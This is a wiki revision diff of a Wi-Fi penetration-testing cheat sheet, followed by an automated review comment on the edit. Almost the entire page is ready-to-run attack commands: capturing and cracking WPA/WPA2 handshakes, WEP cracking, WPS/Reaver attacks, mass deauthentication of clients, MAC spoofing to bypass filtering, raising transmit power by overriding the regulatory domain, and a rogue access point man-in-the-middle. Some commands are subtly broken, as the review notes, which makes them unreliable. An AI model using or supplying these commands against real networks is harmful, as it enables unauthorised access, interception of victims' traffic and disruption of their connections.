cheatsheet_wifi [2021/12/09 13:51] M0N5T3R créée |
cheatsheet_wifi [2021/12/09 13:59] (Version actuelle) M0N5T3R |
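--- a/cheatsheet_wifi
+++ b/cheatsheet_wifi
@@ -1,227 +1,501 @@
-Cette page est un fork de https://github.com/OlivierLaflamme/Cheatsheet-God/blob/master/Cheatsheet_WirelessTesting.txt
+Cette page est un fork de https://uceka.com/2014/05/12/wireless-penetration-testing-cheat-sheet/
+**WPA2 PSK attack with aircrack-ng suite.**
-WPA2 PSK attack with aircrack-ng suite.
 ---------------------------------------
+
+
 ifconfig wlan1 # check wireless IFace
+
 sudo airmon-ng check kill # kill issue causing processes
+
 sudo airmon-ng start wlan1 # start monitor mode
+
 sudo airodump-ng wlan1mon # start capturing
+
 sudo airodump-ng --bssid 64:66:B3:6E:B0:8A -c 11 wlan1mon -w output
+
 sudo aireplay-ng --deauth 5 -a 64:66:B3:6E:B0:8A wlan1mon # deauthenticate the client
+
 sudo aircrack-ng output-01.cap dict # crack the passphrase
-WPA PSK attack with aircrack-ng suite.
+
+
+
+**WPA PSK attack with aircrack-ng suite.**
 --------------------------------------
+
+
 Place your wireless card into Monitor Mode
+
 airmon-ng start wlan0
+
+
 Detect all available wireless AP’s and clients
+
 airodump-ng mon0
+
+
 Setting adapter channel
+
 iwconfig mon0 channel <channel_number>
+
+
 Capturing the four-way handshake
+
 airodump-ng --channel <channel_number> --bssid <bssid> --write capture mon0
+
+
 You can capture the handshake passively (it takes time) or de-authenticate a client.
+
+
 De-authentication attack
+
 aireplay-ng --deauth 3 -a <BSSID> -c <client_mac> mon0
+
+
 Deauth every client - aireplay-ng -0 5 -a <bssid> mon0
+
+
 Dictionary Attack
+
 aircrack-ng -w passwords.lst capture-01.cap
+
+
 Brute force Attack
+
 crunch 8 8 0123456789 | aircrack-ng -e "Name of Wireless Network" -w - /root/home/wpa2.eapol.cap
-WEP attack with aircrack-ng suite.
+
+
+
+**WEP attack with aircrack-ng suite.**
 ----------------------------------
+
+
 Place your wireless card into Monitor Mode
+
 airmon-ng start wlan0
+
+
 Detect all available wireless AP’s and clients
+
 airodump-ng mon0
+
+
 Setting adapter channel
+
 iwconfig mon0 channel <channel_number>
+
+
 airodump-ng -c (channel) -w (file name) --bssid (bssid) (interface)
+
+
 aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)
+
+
 aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)
+
+
 aircrack-ng -b (bssid) (file name-01.cap)
-Rogue Access Point Testing
+
+
+
+**Rogue Access Point Testing**
 --------------------------
+
+
 # ifconfig wlan0 down
+
 # iw reg set BO
+
 # iwconfig wlan0 txpower 0
+
 # ifconfig wlan0 up
+
 # airmon-ng start wlan0
+
 # airodump-ng --write capture mon0
+
+
 root@backbox:/home/backbox# ifconfig wlan1 down
+
 root@backbox:/home/backbox# iw reg set BO
+
 root@backbox:/home/backbox# ifconfig wlan1 up
+
 root@backbox:/home/backbox# iwconfig wlan1 channel 13
+
 root@backbox:/home/backbox# iwconfig wlan1 txpower 30
+
 root@backbox:/home/backbox# iwconfig wlan1 rate 11M auto
-Reaver
+
+
+
+**Reaver**
 ------
+
+
 airmon-ng start wlan0
+
 airodump-ng wlan0
+
 reaver -i mon0 -b 8D:AE:9D:65:1F:B2 -vv
+
 reaver -i mon0 -b 8D:AE:9D:65:1F:B2 -S --no-nacks -d7 -vv -c 1
-Pixie WPS
+
+
+
+**Pixie WPS**
 ---------
+
+
 airmon-ng check
+
 airmon-ng start wlan0
+
 airodump-ng wlan0mon --wps
+
 reaver -i wlan0mon -c 11 -b 00:00:00:00:00:00 -K 1
-Wireless Notes
+
+
+
+**Wireless Notes**
 --------------
+
+
 Wired Equivalent Privacy (WEP)
+
 RC4 stream cipher w/ CRC32 for integrity check
+
 - Attack:
+
 By sniffing an ARP packet, then replaying it to get many encrypted replies with different IVs.
+
 - Remediation:
+
 Use WPA2
+
+
 Wifi Protected Access (WPA)
+
 Temporal Key Integrity Protocol (TKIP) Message Integrity Check
+
 - Attack:
+
 Uses a four way handshake, and if that handshake can be captured, then a dictionary attack ban be mounted to find the Pairwise Master Key for the Access Point and client Station.
+
 - Remediation:
+
 Use long-keys
+
+
 Wifi Protected Access 2 (WPA2)
+
 Advanced Encryption Standard (AES)
+
 - Attack:
+
 Uses a four way handshake, and if that handshake can be captured, then a dictionary attack ban be mounted to find the Pairwise Master Key for the Access Point and client Station.
+
 - Remediation:
+
 WPA-Enterprise
+
+
 ----------------------------------------------------------
+
 all credits to @uceka.com for the following section (found below) original work found here https://uceka.com/2014/05/12/wireless-penetration-testing-cheat-sheet/
+
 ----------------------------------------------------------
-WIRELESS ANTENNA
+
+
+**WIRELESS ANTENNA**
 ----------------
+
+
 Open the Monitor Mode
+
 root@uceka:~# ifconfig wlan0mon down
+
 root@uceka:~# iwconfig wlan0mon mode monitor
+
 root@uceka:~# ifconfig wlan0mon up
+
 Increase Wi-Fi TX Power
+
 root@uceka:~# iw reg set B0
+
 root@uceka:~# iwconfig wlan0 txpower <NmW|NdBm|off|auto>
+
 #txpower is 30 (generally)
+
 #txpower is depends your country, please googling
+
 root@uceka:~# iwconfig
+
 Change WiFi Channel
+
 root@uceka:~# iwconfig wlan0 channel <SetChannel(1-14)>
-WEP CRACKING
+
+
+
+**WEP CRACKING**
 ------------
+
+
 Method 1 : Fake Authentication Attack
+
 root@uceka:~# airmon-ng start wlan0
+
 root@uceka:~# airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
+
 #What’s my mac?
+
 root@uceka:~# macchanger --show wlan0mon
+
 root@uceka:~# aireplay-ng -1 0 -a <BSSID> -h <OurMac> -e <ESSID> wlan0mon
+
 root@uceka:~# aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b <BSSID> -h <OurMac> wlan0mon
+
 root@uceka:~# aircrack-ng -b <BSSID> <PCAP_of_FileName>
+
+
 Method 2 : ARP Replay Attack
+
 root@uceka:~# airmon-ng start wlan0
+
 root@uceka:~# airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
+
 #What’s my mac?
+
 root@uceka:~# macchanger --show wlan0mon
+
 root@uceka:~# aireplay-ng -3 -x 1000 -n 1000 -b <BSSID> -h <OurMac> wlan0mon
+
 root@uceka:~# aircrack-ng -b <BSSID> <PCAP_of_FileName>
+
+
 Method 3 : Chop Chop Attack
+
 root@uceka:~# airmon-ng start wlan0
+
 root@uceka:~# airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
+
 #What’s my mac?
+
 root@uceka:~# macchanger --show wlan0mon
+
 root@uceka:~# aireplay-ng -1 0 -e <ESSID> -a <BSSID> -h <OurMac> wlan0mon
+
 root@uceka:~# aireplay-ng -4 -b <BSSID> -h <OurMac> wlan0mon
+
 #Press ‘y’ ;
+
 root@uceka:~# packetforge-ng -0 -a <BSSID> -h <OurMac> -k <SourceIP> -l <DestinationIP> -y <XOR_PacketFile> -w <FileName2>
+
 root@uceka:~# aireplay-ng -2 -r <FileName2> wlan0mon
+
 root@uceka:~# aircrack-ng <PCAP_of_FileName>
+
+
 Method 4 : Fragmentation Attack
+
 root@uceka:~# airmon-ng start wlan0
+
 root@uceka:~# airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
+
 #What’s my mac?
+
 root@uceka:~# macchanger --show wlan0mon
+
 root@uceka:~# aireplay-ng -1 0 -e <ESSID> -a <BSSID> -h <OurMac> wlan0mon
+
 root@uceka:~# aireplay-ng -5 -b <BSSID> -h < OurMac > wlan0mon
+
 #Press 'y' ;
+
 root@uceka:~# packetforge-ng -0 -a <BSSID> -h < OurMac > -k <SourceIP> -l <DestinationIP> -y <XOR_PacketFile> -w <FileName2>
+
 root@uceka:~# aireplay-ng -2 -r <FileName2> wlan0mon
+
 root@uceka:~# aircrack-ng <PCAP_of_FileName>
+
+
 Method 5 : SKA (Shared Key Authentication) Type Cracking
+
 root@uceka:~# airmon-ng start wlan0
+
 root@uceka:~# airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
+
 root@uceka:~# aireplay-ng -0 10 -a <BSSID> -c <VictimMac> wlan0mon
+
 root@uceka:~# ifconfig wlan0mon down
+
 root@uceka:~# macchanger --mac <VictimMac> wlan0mon
+
 root@uceka:~# ifconfig wlan0mon up
+
 root@uceka:~# aireplay-ng -3 -b <BSSID> -h <FakedMac> wlan0mon
+
 root@uceka:~# aireplay-ng --deauth 1 -a <BSSID> -h <FakedMac> wlan0mon
+
 root@uceka:~# aircrack-ng <PCAP_of_FileName>
-WPA / WPA2 CRACKING
+
+
+
+**WPA / WPA2 CRACKING**
 -------------------
+
+
 Method 1 : WPS Attack
+
 root@uceka:~# airmon-ng start wlan0
+
 root@uceka:~# apt-get install reaver
+
 root@uceka:~# wash -i wlan0mon -C
+
 root@uceka:~# reaver -i wlan0mon -b <BSSID> -vv -S
+
 #or, Specific attack
+
 root@uceka:~# reaver -i -c <Channel> -b <BSSID> -p <PinCode> -vv -S
+
+
 Method 2 : Dictionary Attack
+
 root@uceka:~# airmon-ng start wlan0
+
 root@uceka:~# airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
+
 root@uceka:~# aireplay-ng -0 1 -a <BSSID> -c <VictimMac> wlan0mon
+
 root@uceka:~# aircrack-ng -w <WordlistFile> -b <BSSID> <Handshaked_PCAP>
+
+
 Method 3 : Crack with John The Ripper
+
 root@uceka:~# airmon-ng start wlan0
+
 root@uceka:~# airodump-ng -c <Channel> --bssid <BSSID> -w <FileName> wlan0mon
+
 root@uceka:~# aireplay-ng -0 1 -a <BSSID> -c <VictimMac> wlan0mon
+
 root@uceka:~# cd /pentest/passwords/john
+
 root@uceka:~# john -wordlist=<Wordlist> --rules -stdout|aircrack-ng -0 -e <ESSID> -w - <PCAP_of_FileName>
+
+
 Method 4 : Crack with coWPAtty
+
 root@uceka:~# airmon-ng start wlan0
+
 root@uceka:~# airodump-ng -c <Channel> --bssid <BSSID> -w <FileName> wlan0mon
+
 root@uceka:~# aireplay-ng -0 1 -a <BSSID> -c <VictimMac> wlan0mon
+
 root@uceka:~# cowpatty -r <FileName> -f <Wordlist> -2 -s <SSID>
+
 root@uceka:~# genpmk -s <SSID> -f <Wordlist> -d <HashesFileName>
+
 root@uceka:~# cowpatty -r <PCAP_of_FileName> -d <HashesFileName> -2 -s <SSID>
+
+
 Method 5 : Crack with Pyrit
+
 root@uceka:~# airmon-ng start wlan0
+
 root@uceka:~# airodump-ng -c <Channel> --bssid <BSSID> -w <FileName> wlan0mon
+
 root@uceka:~# aireplay-ng -0 1 -a <BSSID> -c <VictimMac> wlan0mon
+
 root@uceka:~# pyrit -r<PCAP_of_FileName> -b <BSSID> -i <Wordlist> attack_passthrough
+
 root@uceka:~# pyrit -i <Wordlist> import_passwords
+
 root@uceka:~# pyrit -e <ESSID> create_essid
+
 root@uceka:~# pyrit batch
+
 root@uceka:~# pyrit -r <PCAP_of_FileName> attack_db
+
+
 Method 6 : Precomputed WPA Keys Database Attack
+
 root@uceka:~# airmon-ng start wlan0
+
 root@uceka:~# airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
+
 root@uceka:~# aireplay-ng -0 1 -a <BSSID> -c <VictimMac> wlan0mon
+
 root@uceka:~# kwrite ESSID.txt
+
 root@uceka:~# airolib-ng NEW_DB --import essid ESSID.txt
+
 root@uceka:~# airolib-ng NEW_DB --import passwd <DictionaryFile>
+
 root@uceka:~# airolib-ng NEW_DB --clean all
+
 root@uceka:~# airolib-ng NEW_DB --stats
+
 root@uceka:~# airolib-ng NEW_DB --batch
+
 root@uceka:~# airolib-ng NEW_DB --verify all
+
 root@uceka:~# aircrack-ng -r NEW_DB <Handshaked_PCAP>
-FIND HIDDEN SSID
+
+
+
+**FIND HIDDEN SSID**
 ----------------
+
+
 root@uceka:~# airmon-ng start wlan0
+
 root@uceka:~# airodump-ng -c <Channel> --bssid <BSSID> wlan0mon
+
 root@uceka:~# aireplay-ng -0 20 -a <BSSID> -c <VictimMac> wlan0mon
+
 ##BYPASS MAC FILTERING
+
+
 root@uceka:~# airmon-ng start wlan0
+
 root@uceka:~# airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
+
 root@uceka:~# aireplay-ng -0 10 --a <BSSID> -c <VictimMac> wlan0mon
+
 root@uceka:~# ifconfig wlan0mon down
+
 root@uceka:~# macchanger --mac <VictimMac> wlan0mon
+
 root@uceka:~# ifconfig wlan0mon up
+
 root@uceka:~# aireplay-ng -3 -b <BSSID> -h <FakedMac> wlan0mon
-MAN IN THE MIDDLE ATTACK
+
+
+
+**MAN IN THE MIDDLE ATTACK**
 ------------------------
+
+
 root@uceka:~# airmon-ng start wlan0
+
 root@uceka:~# airbase-ng -e “<FakeBSSID>” wlan0mon
+
 root@uceka:~# brctl addbr <VariableName>
+
 root@uceka:~# brctl addif <VariableName> wlan0mon
+
 root@uceka:~# brctl addif <VariableName> at0
+
 root@uceka:~# ifconfig eth0 0.0.0.0 up
+
 root@uceka:~# ifconfig at0 0.0.0.0 up
+
 root@uceka:~# ifconfig <VariableName> up
+
 root@uceka:~# aireplay-ng -deauth 0 -a <victimBSSID> wlan0mon
+
 root@uceka:~# dhclient3 <VariableName> &
+
 root@uceka:~# wireshark &
+
 ;select <VariableName> interface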
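Review bot: The placeholders `< OurMac >` on the two Fragmentation Attack lines (`aireplay-ng -5 -b <BSSID> -h < OurMac > wlan0mon` and the following `packetforge-ng` line) contain spaces, so if pasted into a shell the `<` and `>` become stdin/stdout redirections against files named `OurMac` and `wlan0mon` instead of arguments; they should read `<OurMac>` as in the Chop Chop section. Several other commands in the new side will not run as written: `aireplay-ng -0 10 --a <BSSID>` under BYPASS MAC FILTERING should be `-a`, `aireplay-ng -deauth 0` in the MITM block should be `--deauth` (and a count of `0` means it never stops), and `reaver -i -c <Channel> ...` under WPS Attack is missing the interface name after `-i`. `iw reg set B0` in the WIRELESS ANTENNA section uses a digit zero where the Rogue AP section uses the two-letter code `BO`, and that line would benefit from a comment that overriding the regulatory domain to raise txpower may be unlawful in the reader's country, which the "#txpower is depends your country" note only hints at. The Wireless Notes text has the typo "ban be mounted" twice, which should read "can be mounted". Finally, the rewritten first line now attributes the whole page to uceka.com, while the separator text lower down credits uceka only for "the following section"; the earlier sections appear to come from the Cheatsheet-God URL this revision removes, so keeping both attributions would be more accurate.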